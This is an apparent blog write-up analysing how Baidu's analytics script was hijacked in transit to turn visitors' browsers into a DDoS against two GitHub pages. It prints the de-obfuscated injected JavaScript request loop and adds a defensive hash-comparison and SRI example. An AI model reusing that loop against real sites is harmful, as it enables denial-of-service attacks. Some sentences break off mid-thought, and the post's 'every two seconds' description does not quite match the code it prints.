As a Chinese person living outside China, I frequently visit Chinese websites, many of which use advertising and visitor tracking provided by Baidu, the largest search engine in China. As I was browsing one of the most popular Chinese infosec communities, zone.wooyun.org, at around 12:00pm GMT+8, my browser suddenly started to pop up JS alerts every 5 seconds.
My first thought was that someone naughty had XSSed the page, so I opened the developer tools to find the source of the XSS.
Almost instantly I saw that it kept trying to load these two URLs: github.com/greatfire/ and github.com/cn-nytimes/ every few seconds.
After some digging I located the source of the JS that did it, a piece of code on each page:
<div style="display: none;"><script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F3faf3a47435cc512f3b86dc12af100d0' type='text/javascript'%3E%3C/script%3E"));
</script></div>
This is the Baidu user-tracking code, just like the Google Analytics snippet you would see on other websites.
All the function calls were triggered from this file, so I opened http://hm.baidu.com/h.js in my browser:
Seems it has been obfuscated. No custom JS bytecode VM? You call that JS obfuscation? …piece of cake:
// De-obfuscated copy of the injected h.js; the comments are analysis notes.
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
// The two targets; one is picked per request from the current time.
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            // Keep looping for 5 minutes (3E5 ms) after page load,
            // re-arming after a delay equal to the last round-trip time.
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
// The first request fires 2 seconds after load.
setTimeout("r_send2()", 2E3);
Every 2 seconds, as you can see from setTimeout("r_send2()", 2E3), it will try to load a random URL from
I asked some of my friends in China to open the JS file from Baidu.com; it was blank, as it is supposed to be, since the server displays a blank page if the request does not carry an HTTP referrer.
Apparently many other people have discovered it too:
Appears to be HTTP hijacking.
I scanned hm.baidu.com with Nmap; only two ports were open, 80 and 443.
The SSL connection was not hijacked:
It is also worth noting that on port 80 the web server was lighttpd, but on port 443 it was Apache.
What is happening here is pretty clear now:
A certain device at the border between China's internal network and the Internet has hijacked HTTP connections going into China, replacing some JavaScript files from Baidu with malicious ones that would load
every two seconds.
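The check the post does by hand, written up as an added example (not code from the post or from Baidu): compare the same script fetched over plain HTTP and over HTTPS, and flag any host a tracking script has no business contacting. The two response bodies are constructed samples, and the expected-host set is an assumption; the last function shows the Subresource Integrity digest a site owner could pin so a browser refuses a modified copy.

```python
import base64
import hashlib
import re

# Constructed sample bodies (not captured from hm.baidu.com): a clean tracker
# script, and the same resource with the fetch loop the post describes
# injected in transit.
CLEAN_JS = 'var _hmt = _hmt || [];\n(function(){ /* tracking code */ })();\n'
HIJACKED_JS = CLEAN_JS + (
    'url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];\n'
    'function r_send2() { get(url_array[unixtime() % NUM]) }\n'
    'setTimeout("r_send2()", 2E3);\n'
)

# Assumed: hosts the tracking script legitimately needs to reach.
EXPECTED_HOSTS = {"hm.baidu.com", "libs.baidu.com"}

# Captures the host of every absolute http(s) URL in the script body.
URL_RE = re.compile(r'https?://([A-Za-z0-9.-]+)[^"\'\s]*')


def sha256_hex(body: str) -> str:
    return hashlib.sha256(body.encode()).hexdigest()


def unexpected_hosts(body: str) -> set:
    """Hosts referenced by the script that fall outside the expected set."""
    return set(URL_RE.findall(body)) - EXPECTED_HOSTS


def compare_http_https(http_body: str, https_body: str) -> dict:
    """Differential check: the same resource fetched over HTTP and over TLS
    should hash identically. A mismatch plus out-of-scope hosts in the
    plaintext copy is the signature of in-path tampering."""
    same = sha256_hex(http_body) == sha256_hex(https_body)
    extra = unexpected_hosts(http_body)
    return {"same_hash": same,
            "unexpected_hosts": sorted(extra),
            "tampered": (not same) and bool(extra)}


def sri_attribute(body: str) -> str:
    """integrity= value pinning a known-good copy of the script."""
    digest = hashlib.sha256(body.encode()).digest()
    return "sha256-" + base64.b64encode(digest).decode()


if __name__ == "__main__":
    print(compare_http_https(HIJACKED_JS, CLEAN_JS))
    print('<script src="https://hm.baidu.com/h.js" integrity="%s" '
          'crossorigin="anonymous"></script>' % sri_attribute(CLEAN_JS))
```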
OK, that explains something but not everything: why did it start to alert the user with
Warning: malicious javascript detected on this domain
When I opened one of the URLs being DDoSed above, the content was:
alert("WARNING: malicious javascript detected on this domain")
Very clever: using alert to block code execution prevents it from being called in a loop. Maybe it was done by GitHub or GreatFire themselves, who knows.
Conclusion:
Remember this?
http://furbo.org/2015/01/22/fear-china/
In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech.